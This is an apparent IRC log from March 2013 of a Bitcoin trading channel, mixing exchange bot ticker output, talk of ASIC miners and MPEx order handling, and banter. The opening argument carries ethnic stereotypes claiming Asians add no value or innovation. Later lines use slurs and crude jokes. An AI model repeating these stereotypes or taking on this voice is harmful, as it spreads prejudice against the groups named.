02:36:06 buying up usa's debt Mar 14 02:36:56 if the balance of power was shifting to the east we would all be using asian brands and praising asian innovations Mar 14 02:37:00 none of that is occuring Mar 14 02:37:10 every item you currently use was made in asia. Mar 14 02:37:11 only low end manufacturing comes out of china Mar 14 02:37:20 your asian cultural masters slapped an american looking label on it Mar 14 02:37:20 mircea: wrong, only the lowest tech Mar 14 02:37:25 and you're superficial enough for that to work. Mar 14 02:37:33 haha Mar 14 02:37:45 the largest exporter in the world per capita is actually germany Mar 14 02:37:52 its true, its a good trick Mar 14 02:37:53 even when it came to it, asian firms delivered mining asics Mar 14 02:38:00 american firms are still suckingtheir thumb. Mar 14 02:38:02 they didnt innovate them Mar 14 02:38:10 they only were capable of producing them Mar 14 02:38:13 but they delivered them Mar 14 02:38:20 what's blf doing again? Mar 14 02:38:26 not shipping Mar 14 02:38:27 because they have low end manufacturing capability Mar 14 02:38:30 asking for more money? Mar 14 02:38:33 put it this way Mar 14 02:38:43 when mercedes builds a 100k vehicle in a day Mar 14 02:38:56 an asian manufacturer has to produce a months worth+ of low end trinkets Mar 14 02:39:01 to exchange for the good Mar 14 02:39:16 asian productivity is extremely low Mar 14 02:39:29 dude. srsly. Mar 14 02:39:39 bitcoin is mined on asian designed, asian produced, asian delivered asics. Mar 14 02:39:48 forget it already, you're running with a dead horse. Mar 14 02:39:52 mtgox is in asia now btw Mar 14 02:39:54 lulz Mar 14 02:39:58 yea japan Mar 14 02:40:15 inb4 "japan is really just further west" Mar 14 02:40:20 japans entire manufacturing infrastructure was developed from western instruction after WW2 Mar 14 02:40:24 nah i dont really care i love both the west and asia Mar 14 02:40:27 they just excell at implementation Mar 14 02:40:33 again 0 innovation Mar 14 02:40:38 sigh. Mar 14 02:40:46 they both got great girls Mar 14 02:41:04 name a product innovated from japan? Mar 14 02:41:10 anime Mar 14 02:41:20 sushi Mar 14 02:41:21 fuji Mar 14 02:41:23 "it's not a worldwide brand" Mar 14 02:41:26 gundams Mar 14 02:41:27 bukakke Mar 14 02:41:33 all electronics were EU tech, that the japanese perfected Mar 14 02:41:36 bukakke noodles are delicious Mar 14 02:41:36 pasty-ass kids just jack off to it that's all. Mar 14 02:41:43 used ladies panty vending machines Mar 14 02:41:43 ps1,2,3, and 4 Mar 14 02:41:50 yeah i forgot about that Mar 14 02:41:50 handjob machine Mar 14 02:42:02 live sushi Mar 14 02:42:05 the shaw brothers Mar 14 02:42:06 where they serve live fish Mar 14 02:42:09 Bowjob sony is not a global brand stfu Mar 14 02:42:13 as i stated before, if asians were going to rule we would be in awe at all the asian brands\innovations around us Mar 14 02:42:14 kill bill Mar 14 02:42:16 lol Mar 14 02:42:16 fact is none of them exist Mar 14 02:42:31 you're just racist LameCoin Mar 14 02:42:38 jealous of asia or something Mar 14 02:42:39 more like ostrichist Mar 14 02:42:47 asia survive with brute force, they add little value overwall Mar 14 02:42:48 im just stating its a myth that the east is taking anything over Mar 14 02:42:51 they invented engrish as well Mar 14 02:42:56 dub: exactly Mar 14 02:43:14 dub typical scotsman argument. Mar 14 02:43:23 this is like saying mpex doesn't add value because css. Mar 14 02:43:32 things don't work that way, you don't get to define what value is. Mar 14 02:43:43 its like saying the scottish and welsh and irish add no value to britian Mar 14 02:43:44 the only value asia added was providing cheap manufacturing facilities Mar 14 02:43:47 all of these tech innovators you ascribe have higher suicide rates in their sweatshops than american unemployment Mar 14 02:44:01 [HAVELOCK] [HIM] 6 @ 1.75 = 10.5 BTC [+] Mar 14 02:44:07 there are no tech innovators coming out of asia Mar 14 02:44:11 it will cease to scale at some point Mar 14 02:44:15 dub and maybe that's a good thing. Mar 14 02:44:15 its only primitive manufacturing Mar 14 02:44:31 they dont even have the capacity for advanced manufacturing ie germany style Mar 14 02:44:44 dude omfg stop with the bs already Mar 14 02:44:52 all harddrives in the world are made in the same azn river bank Mar 14 02:44:52 how is it bs? Mar 14 02:44:55 when that floods the price doubles. Mar 14 02:44:57 yea and? Mar 14 02:45:05 all memory is made there. all semiconductors are produced in asia Mar 14 02:45:07 putting a HD together is LOW end manufacturing Mar 14 02:45:21 you're from a different future. Mar 14 02:45:25 LameCoin-!*@* added to ignore list. Mar 14 02:45:58 who needs to innvoate when you can rip everything off Mar 14 02:46:26 thats edge case shit, they produce tech because we did the maff and worked out it was cheaper to let them do it Mar 14 02:46:37 isn't that what Hollywood did to John WOO? Mar 14 02:46:44 myea. Mar 14 02:46:50 the first step to own your master is copy him. Mar 14 02:47:19 Ukto https://bitcointalk.org/index.php?topic=138919.0 Mar 14 02:47:36 every good 90's action hollywood film wouldn't exists if they didn't rip off HK cinema Mar 14 02:47:54 coingenuity https://bitcointalk.org/index.php?topic=152658.0 Mar 14 02:48:00 are you like, being attacked or something ? Mar 14 02:48:15 yeah till 97 Mar 14 02:48:17 i remember Mar 14 02:49:44 and the west offers shitty products you don't need? Mar 14 02:50:02 like shake weight Mar 14 02:51:26 like spray on cheese and tube fish Mar 14 02:52:10 [BTCTC] [ASICMINER-PT] 1 @ 0.72489 BTC [+] Mar 14 02:52:41 [BTCTC] [ASICMINER-PT] 1 @ 0.72489 BTC [+] Mar 14 02:52:47 thanks mircea_popescu Mar 14 02:55:33 [BTCTC] [BTC-BOND] 10 @ 0.00999 = 0.0999 BTC [+] Mar 14 03:01:11 [20:52] i think the worst thing that can happen to bitcoin is inflation of money supply through many pointless forks being created Mar 14 03:01:42 what do you mean? There's many forks and they're mostly valueless Mar 14 03:03:49 > trusted BitcoinTalk member < theres such thing?? Mar 14 03:07:51 kakobrekla i trust people on there to deliver prime comedy Mar 14 03:08:15 man you always know how to short it. Mar 14 03:09:43 a_meteorite: because bitcoin Mar 14 03:09:49 what teh fuck Mar 14 03:09:54 LameCoin-: ^ Mar 14 03:10:32 LameCoin-: because bitcoin idiots (perhaps more dconcise) Mar 14 03:11:31 I swear my typing really isnt this bad, make way less errors on local terminals, im blaming synergy Mar 14 03:12:04 blame sensodyne integrated node. Mar 14 03:13:53 I'd blame the corporate notwork except it happens at home too Mar 14 03:15:00 because they got their bitcoin selling guns on SR Mar 14 03:15:57 $mpexlag Mar 14 03:15:58 mircea_popescu: 0.110910892487 seconds Mar 14 03:17:02 [MPEX] [O.BTCUSD.P370T] 900 @ 0.03297065 = 29.6736 BTC [-] Mar 14 03:18:38 this one is going nice too https://bitcointalk.org/index.php?topic=152784.msg1622255;topicseen#msg1622255 Mar 14 03:18:55 no more margin on 1broker, icbit it lost in space Mar 14 03:19:25 Actually there is a closing trade fee now for April and later contracts! Mar 14 03:19:25 They added that in an attempt to force people out of their positions rather than just sitting on them; they claim it'll aid liquidity. Greedy. Mar 14 03:19:26 lmao Mar 14 03:19:40 basically... they fixed the site to stop cheating after i slapped them last year Mar 14 03:19:44 but tht didn't make much money Mar 14 03:19:45 so... Mar 14 03:20:01 [HAVELOCK] [HIM] 5 @ 1.7999 = 8.9995 BTC [+] Mar 14 03:20:01 [HAVELOCK] [HIM] 3 @ 1.8 = 5.4 BTC [+] Mar 14 03:22:16 while bit4x traded over 50mio units on fx :p Mar 14 03:22:37 its gonna get a lot wilder with dbtc Mar 14 03:22:41 what's that, 5mn usd notional ? Mar 14 03:23:09 hm id have to check dat Mar 14 03:32:53 [BTCTC] [ASICMINER-PT] 16 @ 0.72489 = 11.5982 BTC [+] Mar 14 03:33:41 [MPEX] [X.IDIFF.JUN] 2 @ 0.3 = 0.6 BTC [+] Mar 14 03:33:44 [BTCTC] [ASICMINER-PT] 4 @ 0.724999 = 2.9 BTC [+] Mar 14 03:34:44 [BTCTC] [ASICMINER-PT] 6 @ 0.724999 = 4.35 BTC [+] Mar 14 03:36:04 so asicminer market cap is approx 13 million usd.:( Mar 14 03:36:59 is that bad? Mar 14 03:37:15 should i sell? Mar 14 03:37:39 didnt we already see that show ,didnt it start with g and end with a s Mar 14 03:37:57 gas? Mar 14 03:38:15 reruns are kinda boring Mar 14 03:38:41 good times? Mar 14 03:39:00 [HAVELOCK] [HIM] 5 @ 1.8 = 9 BTC [+] Mar 14 03:39:02 [HAVELOCK] [HIM] 2 @ 1.8 = 3.6 BTC [+] Mar 14 03:40:05 [BTCTC] [ASICMINER-PT] 22 @ 0.725 = 15.95 BTC [+] Mar 14 03:41:34 [BTCTC] [ASICMINER-PT] 29 @ 0.7679 = 22.2691 BTC [+] Mar 14 03:43:28 [BTCTC] [ASICMINER-PT] 2 @ 0.7679 = 1.5358 BTC [+] Mar 14 03:46:39 [BTCTC] [ASICMINER-PT] 23 @ 0.7679 = 17.6617 BTC [+] Mar 14 03:49:46 [BTCTC] [ASICMINER-PT] 5 @ 0.768 = 3.84 BTC [+] Mar 14 03:51:39 !ticker btct asicminer.pt Mar 14 03:51:41 ;;ticker Mar 14 03:51:42 I haven't understood a single word you've said since I met you, not one single word. Mar 14 03:51:42 BTCUSD ticker | Best bid: 47.03104, Best ask: 47.18000, Bid-ask spread: 0.14896, Last trade: 47.18000, 24 hour volume: 49293.76971465, 24 hour low: 44.80000, 24 hour high: 47.35000, 24 hour vwap: 46.58184 Mar 14 03:51:43 [BTCTC] [ASICMINER-PT] 1 @ 0.769999 BTC [+] Mar 14 03:51:47 !ticker btct asicminer-pt Mar 14 03:51:50 [BTCT:ASICMINER-PT] 1D: 0.695 / 0.7171 / 0.768 (437 shares, 313.4 BTC), 7D: 0.65 / 0.71809 / 1 (1361 shares, 977.3 BTC), 30D: 0.65 / 0.69841 / 1 (1915 shares, 1337.4 BTC) Mar 14 03:52:00 ;;calc 46.58184 * 400000* 0.69841 Mar 14 03:52:01 13013289.1498 Mar 14 03:52:05 13 on the dot! Mar 14 03:52:24 !ticker m s.dice Mar 14 03:52:26 [MPEX:S.DICE] 1D: 0.00515 / 0.00597371 / 0.00599987 (976 shares, 5.83 BTC), 7D: 0.00413 / 0.00526468 / 0.006 (140672 shares, 740.59 BTC), 30D: 0.00300001 / 0.00613969 / 0.0069 (2440740 shares, 14,985.40 BTC) Mar 14 03:52:46 ;;calc 46.58184 *100000000 * 0.00613969 Mar 14 03:52:47 28599805.723 Mar 14 03:52:50 moar! Mar 14 03:52:54 [BTCTC] [ASICMINER-PT] 1 @ 0.7679 BTC [-] Mar 14 03:53:01 [HAVELOCK] [SDICE] 2 @ 0.57 = 1.14 BTC [+] Mar 14 03:56:01 [HAVELOCK] [HIM] 3 @ 1.83 = 5.49 BTC [+] Mar 14 03:56:10 [BTCTC] [ASICMINER-PT] 9 @ 0.769999 = 6.93 BTC [+] Mar 14 03:56:12 [BTCTC] [ASICMINER-PT] 13 @ 0.77 = 10.01 BTC [+] Mar 14 03:56:22 [BTCTC] [ASICMINER-PT] 20 @ 0.77 = 15.4 BTC [+] Mar 14 03:57:22 [BTCTC] [S.DICE-PT] 10 @ 0.00579 = 0.0579 BTC [+] Mar 14 03:59:26 [BTCTC] [ASICMINER-PT] 1 @ 0.77 BTC [+] Mar 14 04:00:39 [BTCTC] [BTC-TRADING-PT] 60 @ 0.2599 = 15.594 BTC [+] Mar 14 04:03:39 The Obama administration is drawing up plans to give all U.S. spy agencies full access to a massive database that contains financial data on American citizens and others who bank in the country, according to a Treasury Department document seen by Reuters. Mar 14 04:03:47 le lol. Mar 14 04:04:05 fuck mircea Mar 14 04:04:24 i think they decided to give up on google and apple Mar 14 04:04:41 and just go after the citazens again and get their taxes Mar 14 04:05:45 yawell Mar 14 04:06:15 alot of USD bitcoiners about to get fucked Mar 14 04:08:41 [BTCTC] [ASICMINER-PT] 1 @ 0.77 BTC [+] Mar 14 04:09:08 [MPEX] [O.BTCUSD.P390T] 1000 @ 0.04438197 = 44.382 BTC [-] Mar 14 04:09:10 heh I guess asicminer is going weekly dividends Mar 14 04:10:51 some of these companies its hardly worth risking 50btc every month to get a lil div. Mar 14 04:12:22 BitHub: asicminer is the only company I'm really trusting atm Mar 14 04:12:55 want to buy some more of their shares? Mar 14 04:13:02 [BTCTC] [ASICMINER-PT] 4 @ 0.725 = 2.9 BTC [-] Mar 14 04:13:04 [BTCTC] [ASICMINER-PT] 2 @ 0.725 = 1.45 BTC [-] Mar 14 04:13:05 i'm looking for a 1btc each exit Mar 14 04:13:19 lil high Mar 14 04:14:18 bbs, pm me d3 if intrested. Mar 14 04:14:19 http://www.youtube.com/watch?v=5VPzw7bcfpw Mar 14 04:14:24 Sell buttocins according to this dude Mar 14 04:15:39 BitHub: not interested at this time Mar 14 04:19:17 [BTCTC] [BITVPS] 75 @ 0.00688 = 0.516 BTC [+] Mar 14 04:22:30 [BTCTC] [BITVPS] 22 @ 0.00688 = 0.1514 BTC [+] Mar 14 04:24:18 [BTCTC] [S.MPOE-PT] 10 @ 0.000705 = 0.0071 BTC [+] Mar 14 04:26:12 [BTCTC] [S.DICE-PT] 6 @ 0.00579 = 0.0347 BTC [+] Mar 14 04:27:42 [BTCTC] [S.MPOE-PT] 4 @ 0.000706 = 0.0028 BTC [+] Mar 14 04:29:21 anything interesting happen today? Mar 14 04:30:12 notrly Mar 14 04:30:45 [BTCTC] [S.MPOE-PT] 27 @ 0.000707 = 0.0191 BTC [+] Mar 14 04:33:17 [MPEX] [O.BTCUSD.P390T] 750 @ 0.04420293 = 33.1522 BTC [-] Mar 14 04:35:13 well, etoro wants to join the fun but report all back to govt, old poker news rehashed, +ve bloomberg coverage and that malta fund thingy has new cringetastic site. Mar 14 04:35:55 Troic apt summary. Mar 14 04:37:57 https://bitcointalk.org/index.php?topic=152892.msg1622460#msg1622460 Mar 14 04:40:02 [BTCTC] [BTC-TRADING-PT] 2 @ 0.2599 = 0.5198 BTC [+] Mar 14 04:54:09 [MPEX] [S.DICE] 240 @ 0.00569985 = 1.368 BTC [-] Mar 14 04:54:43 [MPEX] [O.BTCUSD.P410T] 600 @ 0.05846793 = 35.0808 BTC [-] Mar 14 04:57:10 ;;ticker Mar 14 04:57:11 BTCUSD ticker | Best bid: 47.68902, Best ask: 47.68943, Bid-ask spread: 0.00041, Last trade: 47.68901, 24 hour volume: 49887.21742911, 24 hour low: 45.00000, 24 hour high: 47.68901, 24 hour vwap: 46.70191 Mar 14 04:57:15 gearing up for $48 woo Mar 14 04:58:48 Damned... Mar 14 04:59:50 i look forward to the day I can pay with some of my expensive meals with 0.1 BTC Mar 14 05:01:19 eheh Mar 14 05:01:29 For now it affords some fastfood snack Mar 14 05:03:12 yeap Mar 14 05:03:40 http://www.quickmeme.com/meme/3td1ly/ Mar 14 05:03:44 my friend Mar 14 05:03:44 lol Mar 14 05:03:48 true story Mar 14 05:03:49 whats and expensive meal? Mar 14 05:03:49 3 Mar 14 05:03:59 $200, for 2 person Mar 14 05:04:11 thats my average price Mar 14 05:04:15 I was gonna say $200 for 1 is starting to get pricey Mar 14 05:04:48 its for 2 Mar 14 05:05:02 though one of my regular haunts has $1/gram steak minimum 200g Mar 14 05:05:14 thats just he steak too, sides/sauce etc is extra Mar 14 05:05:29 if its $1 a gram, it better be kobe beef Mar 14 05:05:35 not some americanized wagyu steak Mar 14 05:05:38 [MPEX] [S.DICE] 1 @ 0.00599986 BTC [+] Mar 14 05:05:48 its wagyu Mar 14 05:06:01 from where tho Mar 14 05:06:28 I want to say australia but I can't remember Mar 14 05:06:31 might be japan Mar 14 05:06:41 theres a ban on export of kobe beef Mar 14 05:06:45 so it cant be from japan Mar 14 05:06:55 most likely australia or america Mar 14 05:07:58 paid $1500 for a table of 5 a little while ago, with plenty of booze Mar 14 05:08:28 actually, i got my info wrong japan lifted the ban on kobe beef Mar 14 05:08:38 but it's still ultra rare in north america Mar 14 05:09:02 i had american wagyu, it was delicious.. I wanna try the real thing one day Mar 14 05:09:31 pork ftw. Mar 14 05:09:51 pork is shit Mar 14 05:10:30 even type-o's can't process that shit properly Mar 14 05:12:58 honestly i dont miss meat at all Mar 14 05:18:10 y u no eat meat? Mar 14 05:18:38 aww blacktape where u goins? Mar 14 05:18:42 my buddy has a good excuse 'I don't eat anything that has to shit' Mar 14 05:18:43 there u iz. Mar 14 05:20:17 for every reason really Mar 14 05:20:59 also smoked cigs for 10 yrs and quit Mar 14 05:21:14 just stuff i dont need or want Mar 14 05:21:18 anymore Mar 14 05:21:27 on to new vices Mar 14 05:21:41 I kicked smoking and most drugs Mar 14 05:22:06 none of my vego friends are particularly healthy Mar 14 05:22:30 they still shitty food Mar 14 05:22:30 i'm no supermodel, but thats mostly cuz i'm on the computer too much Mar 14 05:22:37 eat* Mar 14 05:22:39 doc says i'm fine Mar 14 05:23:01 [HAVELOCK] [SDICE] 6 @ 0.55 = 3.3 BTC [-] Mar 14 05:23:29 anywho Mar 14 05:23:36 i think BFL will ship this month Mar 14 05:24:27 because they are flying Luke-Jr out to make the software work? Mar 14 05:25:37 given that they have not reached out to ask upgraders to return fpgas I doubt it Mar 14 05:26:36 [BTCTC] [S.DICE-PT] 3 @ 0.0055 = 0.0165 BTC [-] Mar 14 05:27:48 [BTCTC] [S.DICE-PT] 1 @ 0.005 BTC [-] Mar 14 05:27:50 [BTCTC] [S.DICE-PT] 50 @ 0.005 = 0.25 BTC [-] Mar 14 05:27:52 [BTCTC] [S.DICE-PT] 449 @ 0.005 = 2.245 BTC [-] Mar 14 05:34:09 hey mircae_popescu: what will your new method for getting order id's out to brokers be? Mar 14 05:34:15 i'm reading your feb 2013 "innards" post Mar 14 05:34:52 and how does that manifest as a significant pain point? i haven't noticed a significant lag between when people post orders and when the pastebin goes up Mar 14 05:42:46 im not sure what the question is Mar 14 05:42:56 hang on Mar 14 05:43:15 It doesn’t currently even know what id that order will receive in the trade engine, which is even more inconvenient for brokers that handle multiple customer accounts (but we’re working on a way to significantly mitigate this, which will be the next major update barring exigent necessity). Mar 14 05:43:25 so a) what is new method Mar 14 05:44:04 and b) not really a question but this is a pain point for people? just wait ten seconds for order id to get returned. Mar 14 05:46:16 mircea_popescu: yeah, lots of crazy people Mar 14 05:46:59 coingenuity is it an organised effort is my question Mar 14 05:47:35 mircea_popescu: no idea, i work 20 hour days so i dont really pay attention to forums Mar 14 05:47:58 mircea_popescu: as far as i'm concerned, there's nothing of note to read there anyway... just a bunch of bitcoin-tabloid type topics bout nothing :/ Mar 14 05:48:21 coingenuity i have people paid to pay attention and i have people paid to man the watchtowers for me. Mar 14 05:48:30 paranoia ftw. Mar 14 05:48:50 benkay superficially it is not a problem, but on the old system (before the previous upgrade) there existed windows of a few minutes between when the trade engine executed and when the web proxies reported. Mar 14 05:48:53 wtf is this horse shit https://bitcointalk.org/index.php?topic=152910.0 Mar 14 05:48:56 on one occasion this window was like one hour Mar 14 05:49:12 it obviously couldn't go on. Mar 14 05:49:37 the solution basically allows the person putting in the order to compute a hash of it and then identify it in their execution reports. Mar 14 05:49:44 neat! Mar 14 05:50:15 also thank you. Mar 14 05:50:20 at the present time it only works if your order hits the book Mar 14 05:50:44 i am considering expanding it to work both ways and fully identify trades but there's also performance issues to consider and a whole keboodle. Mar 14 05:50:52 anyway. working on it as they say. Mar 14 05:52:23 kakobrekla lol continued support Mar 14 05:53:17 pokey as in Magical Pokey Usagi? Mar 14 05:53:19 and whats with the people funding fiat investments with bitcoin Mar 14 05:53:23 are they brain dead Mar 14 05:53:44 kakobrekla yes, well... Mar 14 05:55:00 [BTCTC] [ASICMINER-PT] 1 @ 0.75 BTC [+] Mar 14 05:57:53 meh. let brokers track their own orders. Mar 14 06:02:02 well ideally they should, but Mar 14 06:08:34 [21:21] i think BFL will ship this month <-- I see your putting your mouth where your money is. ;) Mar 14 06:08:36 j/k Mar 14 06:10:19 Beauxe : Newbie : Re: Bitcoin Businesses and Developers, Let's Get Started! : Today at 04:07:51 AM Mar 14 06:10:22 I have run and started commodity exchanges. I am currently running one and would like to apply our technology and knowledge to bit coin. There is a decent possibility we may be able to list futures and other derivatives around BTC and LTC. Please whitelist me. Mar 14 06:10:44 fuck me. Mar 14 06:14:38 sigh. Mar 14 06:14:53 kakobrekla better start with the See here links Mar 14 06:15:14 mircae how did you get into the business of starting an exchange? Mar 14 06:15:26 assbot would say 'you actions are useless' Mar 14 06:16:46 Bit Coins Mar 14 06:16:49 heh Mar 14 06:18:01 [BTCTC] [ASICMINER-PT] 1 @ 0.71 BTC [-] Mar 14 06:18:09 [BTCTC] [ASICMINER-PT] 1 @ 0.71 BTC [-] Mar 14 06:18:29 smoke break on train! Mar 14 06:18:33 i'm out Mar 14 06:20:07 why does he keep calling me mircae Mar 14 06:21:18 http://1.bp.blogspot.com/-U-G1FRmhtkQ/TtHOfdeKaII/AAAAAAAAAEs/H7GY4kqmG88/s1600/EhgJk.jpg Mar 14 06:21:27 the day you find there's a new pope from this bitcoi nbetting site you're involved with Mar 14 06:21:55 ya kakotrolka , i'm sure that's what it is. Mar 14 06:22:04 :) Mar 14 06:22:18 "our technologies" Mar 14 06:22:32 people are basically in the middle ages, they;'d like to apply their potions and salves Mar 14 06:22:35 to bitcoin! Mar 14 06:27:02 meanwhile im trolling sarah silverman. curious how this goes. Mar 14 06:27:34 heh really? Mar 14 06:28:30 https://twitter.com/Mircea_Popescu/status/312057153810755586 Mar 14 06:29:01 in my experience nothing burns the retarded left more than pointing out that their bullshit is mostly dreamed up. Mar 14 06:29:15 i guess it must remind them of their parents or something. Mar 14 06:29:22 hah maybe she's trolling? Mar 14 06:29:54 seems like something she would do Mar 14 06:30:19 nice background pic hehe Mar 14 06:30:21 a contest! Mar 14 06:30:36 any background story behind your twitter wallpaper photo mircea? Mar 14 06:30:40 i didn't even notice, what's she got ? Mar 14 06:30:47 a puppy oh Mar 14 06:30:58 i meant yours Mar 14 06:30:59 oh i thought it was mircea walking down the street Mar 14 06:31:08 mkay i guess i grep the logs. Mar 14 06:31:20 you know who's fun to troll on twitter? Kanye West Mar 14 06:31:32 because he'll actually take it serious and reply and go on about it Mar 14 06:33:09 she was pretty hot in those seinfeld eps Mar 14 06:33:23 wait. kayne west is female ?! Mar 14 06:33:52 toffoo too lazy to grep this monstrous 2mb log. basically, me in mexico walking down the street eatin' chocolates Mar 14 06:33:56 out of my european caryall Mar 14 06:34:01 heh duh Mar 14 06:34:01 [HAVELOCK] [SDICE] 1 @ 0.56899999 BTC [+] Mar 14 06:34:02 [HAVELOCK] [SDICE] 1 @ 0.569 BTC [+] Mar 14 06:34:23 it's a dude gtfo Mar 14 06:34:33 its a gayfish Mar 14 06:34:56 [MPEX] [O.BTCUSD.P410T] 600 @ 0.05716318 = 34.2979 BTC [-] Mar 14 06:35:24 https://www.youtube.com/watch?v=7nE7eofIeD4 Mar 14 06:35:42 top 5 gayfish moments Mar 14 06:36:20 "it's not a purse, it's european"? Mar 14 06:36:33 yeh Mar 14 06:39:34 mircea_popescu: update the faq and s/oldkeyid/newkeyid/. you changed it at the top, but oldkeyid persists further down. Mar 14 06:39:41 the mpex faq, that is. Mar 14 06:39:53 nanotube yup, it's in process Mar 14 06:40:48 mk. Mar 14 06:41:14 Ukto: hm, bfl? Mar 14 06:41:36 coingenuity: check your pms Mar 14 06:41:39 old fart Mar 14 06:51:07 [BTCTC] [BTC-GOLD] 1 @ 0.0139 BTC [-] Mar 14 06:51:56 [BTCTC] [BTC-BOND] 1 @ 0.00999 BTC [+] Mar 14 06:52:59 4 line quit message ? that guy should be klined Mar 14 06:53:11 right? Mar 14 06:53:20 totally. Mar 14 06:54:09 mircea_popescu is there a way you can check if my account is active still Mar 14 06:54:29 sure Mar 14 06:54:34 ;;ident grubles Mar 14 06:54:35 Nick 'grubles', with hostmask 'grubles!~buttsniff@unaffiliated/grubles', is not identified. Mar 14 06:54:46 you'll have to id Mar 14 06:54:55 np Mar 14 06:55:21 ;;ident Mar 14 06:55:21 You are identified as user grubles, with GPG key id DDA96139C85CA43C, key fingerprint E02F7FF6CF582669BB266B53DDA96139C85CA43C, and bitcoin address 1DYVwy7Ru7fJ8HwwoL5VHTUR5jCWG38JPk Mar 14 06:56:34 grubles yup. Mar 14 06:56:57 kewl thanks Mar 14 07:02:58 !help Mar 14 07:02:59 List of commands: Mar 14 07:03:00 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) Mar 14 07:03:01 !mp (desc: returns the response from MPEX order) Mar 14 07:03:06 !ticker m s.mpoe Mar 14 07:03:08 [MPEX:S.MPOE] 1D: 0.00076706 / 0.00076706 / 0.00076706 (5000 shares, 3.84 BTC), 7D: 0.00067334 / 0.00074201 / 0.00076718 (903469 shares, 670.39 BTC), 30D: 0.00061614 / 0.00069343 / 0.00078628 (45613856 shares, 31,630.07 BTC) Mar 14 07:03:30 !mp http://dpaste.com/ijustmadethisup Mar 14 07:03:31 Processing. Mar 14 07:03:33 Response: http://dpaste.com/1022369/plain/ Mar 14 07:03:50 ;;ident assbot Mar 14 07:03:51 Nick 'assbot', with hostmask 'assbot!~assbot@unaffiliated/kakobrekla/bot/assbot', is not identified. Mar 14 07:04:01 ;;ident mpexbot Mar 14 07:04:01 Nick 'mpexbot', with hostmask 'mpexbot!~supybot@unaffiliated/smickles/bot/mpexbot', is not identified. Mar 14 07:04:12 spam Mar 14 07:04:17 hehe im writing an article Mar 14 07:04:20 $help Mar 14 07:04:20 mircea_popescu: (help [] []) -- This command gives a useful description of what does. is only necessary if the command is in more than one plugin. Mar 14 07:04:32 $help post Mar 14 07:04:33 mircea_popescu: (post ) -- Supply a pastebin paste key containing a signed and encrypted MPEx command. Respondes with a pastebin URL with MPEx's response. Mar 14 07:04:44 $help vwap Mar 14 07:04:44 mircea_popescu: (vwap []) -- Returns a pastebin link with all available market data, excepting depth. If an MPSIC is specified, returns only the data relevant to that MPSIC in IRC. Mar 14 07:04:47 $help depth Mar 14 07:04:47 mircea_popescu: (depth []) -- Returns the full market depth. If an MPSIC is specified, returns only the depth of the specified MPSIC in IRC. Mar 14 07:04:53 $help proxies Mar 14 07:04:53 mircea_popescu: An error has occurred and has been logged. Please contact this bot's administrator for more information. Mar 14 07:05:04 $post ijustmadethisup Mar 14 07:05:06 mircea_popescu: An error has occurred and has been logged. Please contact this bot's administrator for more information. Mar 14 07:05:08 orly ?! Mar 14 07:05:11 $post 12455 Mar 14 07:05:13 mircea_popescu: An error has occurred and has been logged. Please contact this bot's administrator for more information. Mar 14 07:05:15 heh. Mar 14 07:05:23 *claps* Mar 14 07:05:28 $post qU4hTtcP Mar 14 07:05:30 mircea_popescu: http://pastebin.com/fyMWzm04 Mar 14 07:05:45 $vwap O.BTCUSD.P750T Mar 14 07:05:46 mircea_popescu: {u'7d': {u'cnt': u'5', u'min': u'79079695', u'max': u'90144085', u'vsa': u'216644138243', u'vsh': u'2408', u'avg': u'89968495.9481'}, u'30d': {u'cnt': u'33', u'min': u'79079695', u'max': u'153153505', u'vsa': u'3065600173348', u'vsh': u'28783', u'avg': u'106507319.367'}, u'1d': {u'cnt': u'', u'min': u'', u'max': u'', u'vsa': u'', u'vsh': u'', u'avg': u''}} Mar 14 07:05:57 $depth S.BBET Mar 14 07:05:58 mircea_popescu: Bids: ['300 @ 150000', '500 @ 140000', '1000 @ 130000', '1000 @ 120010', '5000 @ 120000'] Mar 14 07:05:59 mircea_popescu: Asks: ['300 @ 181000', '500 @ 183000', '1000 @ 185000', '3000 @ 190000', '2210 @ 197000'] Mar 14 07:06:04 $proxies Mar 14 07:06:05 mircea_popescu: ["http://mpex.co", "http://mpex.ws", "http://mpex.bz", "http://mpex.coinbr.com", "http://mpex6.coinbr.com"] Mar 14 07:06:37 ok sorry for spam everyone, documenting this. Mar 14 07:07:30 dev team thinks tests are silly Mar 14 07:07:42 lul Mar 14 07:07:50 mpex runs tests on production in public Mar 14 07:07:55 wild west i tell you Mar 14 07:07:55 basically i can't shake this tom green image from my head. Mar 14 07:08:07 you know what scene when he delivers a baby in the messiest way possible Mar 14 07:08:11 theyre too busy polishing their shiny new avalon asics Mar 14 07:08:14 and then proceeds to yammer that he "Saved the day" Mar 14 07:08:21 and "they have a problem with heroes around here" ? Mar 14 07:08:30 tom green was funny when i was in middle school Mar 14 07:08:52 grubles which is why he's so adequate in this discussion Mar 14 07:08:53 except freddy got fingered Mar 14 07:09:29 chorus: "go do it yourself!" Mar 14 07:09:50 there can be alternates but they wont have the bitcoin mafia i mean foundation backing them Mar 14 07:12:02 itll just be a fork Mar 14 07:12:05 i think? Mar 14 07:12:05 it's complicated Mar 14 07:12:06 don't worry Mar 14 07:12:14 51% controls things Mar 14 07:12:20 people will either have to accept one client over another Mar 14 07:12:24 this time the devs convinced the miners to do things their way. Mar 14 07:12:35 this may not always be the case. Mar 14 07:12:57 especially when power begins to concentrate behind people who understand how open platforms are supposed to work Mar 14 07:13:18 or people with lots of money Mar 14 07:13:21 benkay moreover, especially as people with actual skin in the game start to emerge. Mar 14 07:13:30 currently the miners are more in it for the bragging rights than for the money Mar 14 07:13:36 not really Mar 14 07:13:37 think cambrian explosion of bitcointech Mar 14 07:13:38 this makes for a very dysfunctional lord of the flies environment Mar 14 07:14:04 monoculture bad Mar 14 07:14:07 say it with me Mar 14 07:14:09 monoculture bad Mar 14 07:14:11 fragile Mar 14 07:14:31 centralized. Mar 14 07:16:09 interoperability is typically important Mar 14 07:16:48 but beyond my pay grade tbh Mar 14 07:16:48 slash skill level Mar 14 07:16:48 to comment on that. Mar 14 07:17:28 also it's *inevitable* that the chain fork and fuck some people eventually Mar 14 07:17:37 people all want reward and no risk Mar 14 07:17:51 best have good tech, homeboy Mar 14 07:18:00 but it's cool for now Mar 14 07:18:12 the people who appreciate well engineered things will quietly keep their shit regular Mar 14 07:18:28 while the rest of the plebnet falls further and further behind Mar 14 07:18:32 till one day Mar 14 07:18:32 fork Mar 14 07:18:42 recreational miners are fucked Mar 14 07:18:53 this is actually a pretty bad future benkay Mar 14 07:19:07 and one that is very probable if people stuck to the sort of nonsense evertyone's used to. Mar 14 07:19:13 but i shall endeavour to break that. Mar 14 07:20:14 no it's a possibility though Mar 14 